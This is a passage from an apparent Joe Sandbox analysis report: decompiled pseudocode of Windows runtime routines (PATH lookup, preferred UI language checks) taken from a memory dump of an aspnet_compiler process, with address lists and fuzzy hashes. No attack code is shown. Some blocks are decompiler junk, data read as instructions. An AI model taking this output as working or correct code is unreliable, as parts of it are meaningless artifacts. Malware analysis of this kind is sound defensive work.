				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				intOrPtr _t285;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				intOrPtr* _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;
				void* _t343;
				void* _t344;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x133d360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x133b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t344 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t285 = 0x48;
				_t315 = 0 | _t344 == 0x00000000;
				_t326 = 0;
				_v37 = _t344 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L01264620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t285;
							_t287 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x1338478;
								 *_t333 = ((0 | _t315 == 0x01338478) - 0x00000001 & 0xfffffffb) + 7;
								E0128F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t341 = _t341 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E012D39F2(_t328);
									_t315 = _v32;
									_t328 = _t279;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t333 + _t287 * 4;
								_v56 = _t289;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t240 =  *(_v60 + _t299 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t299 * 4);
										 *(_t289 + 0x18) = _t328;
										_t244 =  *(_v60 + _t299 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01272959))) {
												case 0:
													__ax =  *0x1338488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0128F3E0(__edi,  *0x133848c, __ax & 0x0000ffff);
														__eax =  *0x1338488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0128F3E0(_t328, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0x1338480 & 0x0000ffff = E0128F3E0(__edi,  *0x1338484,  *0x1338480 & 0x0000ffff);
													__eax =  *0x1338480 & 0x0000ffff;
													__eax = ( *0x1338480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0128F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0128F3E0(_t328, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t328 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx = "\\W:w\\W:w";
													__eflags = __ebx - "\\W:w\\W:w";
													if(__ebx != "\\W:w\\W:w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0128F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W:w\\W:w";
														} while (__ebx != "\\W:w\\W:w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1338478 & 0x0000ffff = E0128F3E0(__edi,  *0x133847c,  *0x1338478 & 0x0000ffff);
													__eax =  *0x1338478 & 0x0000ffff;
													__eax = ( *0x1338478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E012D39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1336e58 & 0x0000ffff = E0128F3E0(__edi,  *0x1336e5c,  *0x1336e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1336e58 & 0x0000ffff;
													__eax = ( *0x1336e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t326 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01272935))) {
							case 0:
								__ax =  *0x1338488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E01272E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1338480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1338480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0125EEF0(0x13379a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0125EB70(__ecx, 0x13379a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1337b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0125EB70(__ecx, 0x13379a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t286);
										return E0128B640(_t219, _t286, _v8 ^ _t338, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t283 = E01272E3E(_t281,  &_v36);
									_t295 = _v36;
									_v76 = _t283;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x1335764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1338478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1338478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1336e58 & 0x0000ffff;
								__eax = ( *0x1336e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t300 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("daa");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t341;
					asm("daa");
					_t245 = _t244 + _t341;
					asm("daa");
					asm("daa");
					 *_t333 =  *_t333 + _t338;
					asm("daa");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t245;
					asm("daa");
					 *0x1f012726 =  *0x1f012726 + _t245;
					_pop(_t290);
					_t247 = _t341;
					_t343 = _t245 -  *_t300;
					 *_t328 =  *_t328 - _t247;
					 *0x2012b5b =  *0x2012b5b + _t333;
					 *_t328 =  *_t328 - _t343;
					 *((intOrPtr*)(_t247 - 0x9fed8d8)) =  *((intOrPtr*)(_t247 - 0x9fed8d8)) + _t247;
					asm("daa");
					asm("daa");
					 *_t333 =  *_t333 + _t290;
					 *_t328 =  *_t328 - _t247;
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t300;
					asm("daa");
					_a35 = _a35 + _t290;
					asm("daa");
					_pop(_t291);
					asm("daa");
					 *((intOrPtr*)(_t343 + _t291 * 2)) =  *((intOrPtr*)(_t343 + _t291 * 2)) + _t333;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x131ff00);
					E0129D08C(_t291, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t305 = _t256 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x1221664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E0128E5C0(_a8,  *((intOrPtr*)(_t305 + 0x1221668)), _t292);
									_t343 = _t343 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t336 = E012C51BE(_t292,  *((intOrPtr*)(_v48 + 0x122166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E01272AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t261 = E01256600( *(_t317 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E01272C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t268 = E01272AE4( &_v36, _a8, _t292, _a16, _a20, _t336);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E01272C50(_v36, _a8, _t292, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E01272ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t336;
					}
					L70:
					return E0129D0D1(_t254);
				}
				L108:
			}

0x01272584
0x01272586
0x01272590
0x01272596
0x01272597
0x01272598
0x01272599
0x0127259e
0x012725a4
0x012725a9
0x012725ac
0x012725ae
0x012725b1
0x012725b2
0x012725b5
0x012725b8
0x012725bb
0x012725bc
0x012725bf
0x012725c2
0x012725c5
0x012725c6
0x012725cb
0x012725ce
0x012725d8
0x012725db
0x012725dd
0x012725de
0x012725e1
0x012725e3
0x012725e9
0x012726da
0x012726da
0x012726dd
0x012726e2
0x012b5b56
0x00000000
0x012726e8
0x012726f9
0x012726fb
0x012726fe
0x01272700
0x012b5b60
0x00000000
0x01272706
0x01272706
0x0127270a
0x0127270a
0x0127270d
0x01272713
0x01272716
0x01272718
0x0127271c
0x0127271e
0x012b5b6c
0x012b5b6f
0x012b5b7f
0x012b5b89
0x012b5b8e
0x012b5b93
0x012b5b96
0x012b5b9c
0x012b5ba0
0x012b5ba3
0x012b5bab
0x012b5bb0
0x012b5bb3
0x012b5bb3
0x012b5ba3
0x01272724
0x01272726
0x01272729
0x0127272c
0x0127279d
0x0127279d
0x012727a0
0x012727a2
0x00000000
0x0127272e
0x0127272e
0x01272731
0x01272734
0x01272734
0x01272736
0x012b5bc1
0x012b5bc1
0x012b5bc4
0x00000000
0x012b5bca
0x012b5bca
0x012b5bcd
0x00000000
0x012b5bd3
0x00000000
0x012b5bd3
0x012b5bcd
0x0127273c
0x0127273c
0x01272742
0x01272747
0x0127274a
0x0127274d
0x01272750
0x00000000
0x01272756
0x01272756
0x00000000
0x01272902
0x01272908
0x0127290b
0x00000000
0x01272911
0x0127291c
0x01272921
0x00000000
0x01272921
0x00000000
0x00000000
0x01272880
0x01272887
0x0127288c
0x00000000
0x00000000
0x01272805
0x0127280a
0x01272814
0x01272816
0x00000000
0x00000000
0x0127281e
0x01272821
0x01272823
0x00000000
0x01272829
0x01272829
0x01272831
0x0127283c
0x0127283e
0x00000000
0x0127283e
0x00000000
0x00000000
0x0127284e
0x01272850
0x01272851
0x01272854
0x01272857
0x0127285a
0x0127285c
0x0127285d
0x00000000
0x00000000
0x0127275d
0x01272761
0x00000000
0x01272767
0x0127276e
0x01272773
0x01272773
0x01272776
0x01272778
0x0127277e
0x0127277e
0x01272781
0x01272781
0x01272783
0x01272784
0x00000000
0x00000000
0x012b5bd8
0x012b5bde
0x012b5be4
0x012b5be6
0x012b5be8
0x012b5be9
0x012b5bee
0x012b5bf8
0x012b5bff
0x012b5c01
0x012b5c04
0x012b5c07
0x012b5c0b
0x012b5c0d
0x012b5c0d
0x012b5c15
0x012b5c18
0x012b5c1b
0x012b5c1b
0x012b5c1e
0x00000000
0x00000000
0x012728c3
0x012728c8
0x012728d2
0x012728d4
0x012728d8
0x012728db
0x012b5c26
0x012b5c28
0x012b5c2d
0x012b5c2d
0x00000000
0x00000000
0x012b5c34
0x012b5c36
0x012b5c49
0x012b5c4e
0x012b5c54
0x012b5c5b
0x012b5c5d
0x012b5c60
0x01272788
0x01272788
0x0127278b
0x0127278e
0x0127278e
0x0127278e
0x01272791
0x00000000
0x00000000
0x01272756
0x01272750
0x00000000
0x01272794
0x01272794
0x01272795
0x01272798
0x01272798
0x00000000
0x01272734
0x0127272c
0x01272700
0x012725ef
0x012725ef
0x012725ef
0x012725f2
0x012725f8
0x00000000
0x00000000
0x012725fe
0x00000000
0x012728e6
0x012728ec
0x012728ef
0x012728f5
0x012728f8
0x012728f8
0x00000000
0x012728f8
0x00000000
0x00000000
0x01272866
0x01272866
0x01272876
0x01272879
0x00000000
0x00000000
0x012727e0
0x012727e7
0x012727e9
0x012727eb
0x012b5afd
0x00000000
0x012b5afd
0x00000000
0x00000000
0x01272633
0x01272638
0x0127263b
0x0127263c
0x0127263e
0x01272640
0x01272642
0x01272647
0x01272649
0x0127264e
0x01272650
0x01272653
0x01272659
0x012726a2
0x012726a7
0x012726ac
0x012726b2
0x012b5b11
0x012b5b15
0x012b5b17
0x00000000
0x012726b8
0x012726b8
0x012726ba
0x012727a6
0x012727a6
0x012727a9
0x012727ab
0x012727b9
0x012727b9
0x012727be
0x012727c1
0x012727c3
0x012727c5
0x012727c7
0x012b5c74
0x012b5c79
0x012b5c79
0x012727c7
0x00000000
0x012726c0
0x012726c0
0x012726c3
0x012726c6
0x012726c6
0x012726c9
0x012726c9
0x00000000
0x012726c9
0x012726ba
0x0127265b
0x0127265b
0x0127265e
0x01272667
0x0127266d
0x01272677
0x0127267c
0x0127267f
0x01272681
0x012b5b49
0x012b5b4e
0x012727cd
0x012727d0
0x012727d1
0x012727d2
0x012727d4
0x012727dd
0x01272687
0x01272687
0x0127268a
0x0127268b
0x0127268e
0x0127268f
0x01272691
0x01272696
0x01272698
0x0127269d
0x0127269f
0x00000000
0x0127269f
0x01272681
0x00000000
0x00000000
0x01272846
0x00000000
0x00000000
0x01272605
0x0127260a
0x0127260c
0x01272611
0x01272616
0x01272619
0x01272619
0x0127261e
0x00000000
0x01272624
0x01272627
0x01272627
0x00000000
0x00000000
0x012b5b1f
0x00000000
0x00000000
0x01272894
0x0127289b
0x0127289d
0x012728a1
0x012b5b2b
0x012b5b2e
0x012b5b2e
0x012728a7
0x012728a9
0x012b5b04
0x012b5b09
0x012b5b09
0x012b5b09
0x00000000
0x00000000
0x012b5b35
0x012b5b3c
0x012728fb
0x012728fb
0x012726cc
0x012726cc
0x012726d0
0x00000000
0x012726d2
0x012726d2
0x00000000
0x012726d2
0x00000000
0x00000000
0x012725fe
0x0127292d
0x0127292f
0x01272930
0x01272935
0x01272937
0x01272938
0x0127293b
0x0127293c
0x0127293e
0x0127293f
0x01272940
0x01272942
0x01272944
0x01272947
0x01272948
0x0127294e
0x01272951
0x01272951
0x01272952
0x01272954
0x0127295a
0x0127295c
0x01272962
0x01272963
0x01272964
0x01272966
0x01272968
0x0127296b
0x0127296c
0x0127296f
0x01272972
0x01272977
0x01272978
0x0127297d
0x0127297e
0x0127297f
0x01272980
0x01272981
0x01272982
0x01272983
0x01272984
0x01272985
0x01272986
0x01272987
0x01272988
0x01272989
0x0127298a
0x0127298b
0x0127298c
0x0127298d
0x0127298e
0x0127298f
0x01272990
0x01272992
0x01272997
0x012729a3
0x012729a6
0x012729ab
0x012729ad
0x012729b0
0x012729b2
0x012b5c80
0x012729b8
0x012729b8
0x012729bb
0x012729c0
0x012729c5
0x012729c6
0x012729c6
0x012729c9
0x012729cb
0x00000000
0x00000000
0x012729cd
0x012729d0
0x012729d9
0x012729db
0x012729dd
0x01272a7f
0x01272a84
0x01272a87
0x01272a89
0x012b5ca1
0x012b5ca3
0x00000000
0x01272a8f
0x01272a8f
0x00000000
0x01272a8f
0x00000000
0x012729e3
0x012729e3
0x012729e3
0x00000000
0x012729e3
0x012729dd
0x00000000
0x012729db
0x012729e6
0x012729e9
0x012729eb
0x012729ed
0x012729f3
0x012729f5
0x012729f8
0x012729fa
0x01272a97
0x01272a9a
0x01272a9d
0x01272add
0x00000000
0x01272a9f
0x01272aa2
0x01272aa5
0x01272aa8
0x01272aab
0x012b5cab
0x012b5caf
0x012b5cc5
0x012b5cda
0x012b5cdc
0x012b5cdf
0x012b5ce5
0x00000000
0x012b5ceb
0x012b5ced
0x012b5cee
0x00000000
0x012b5cee
0x012b5cb1
0x012b5cb4
0x012b5cb9
0x012b5cbb
0x00000000
0x012b5cbd
0x012b5cbd
0x00000000
0x012b5cbd
0x012b5cbb
0x01272ab1
0x01272ab1
0x01272ac4
0x01272ac6
0x01272ac6
0x00000000
0x01272ac6
0x01272aab
0x00000000
0x01272a00
0x01272a09
0x01272a0e
0x01272a21
0x01272a24
0x01272a35
0x01272a3a
0x01272a3d
0x01272a42
0x01272a59
0x01272a59
0x01272a5c
0x01272a5f
0x01272a5f
0x012729fa
0x012729f3
0x01272a64
0x01272a64
0x01272a6b
0x01272a6b
0x01272a6d
0x01272a72
0x01272a72
0x00000000

Strings

PATH, xrefs: 01272642, 01272691

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 2f67faead5b84f70833a9b36d711f73875bf5351c79fe0d2196cd16caf7fa7d2
Instruction ID: 0db713f8b3a6abe78cdb4e3ab637a53bfb36eec2a37406cb600fb23edc2c6feb
Opcode Fuzzy Hash: 2f67faead5b84f70833a9b36d711f73875bf5351c79fe0d2196cd16caf7fa7d2
Instruction Fuzzy Hash: 17C19071D2021ADFDB29DF99D981BBEBBB5FF48740F084029E901BB250E774A941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0127FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0127FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0125EEF0(0x1337b60);
					_t134 =  *0x1337b84; // 0x773a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1337b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1337b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01256D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E012576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E012E8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0124B150();
													}
													_t116 = E012E6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E012575CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1338638; // 0x0
																	_t122 = L012538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E012576E2(_t154);
																			goto L41;
																		}
																	} else {
																		E012576E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0127FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
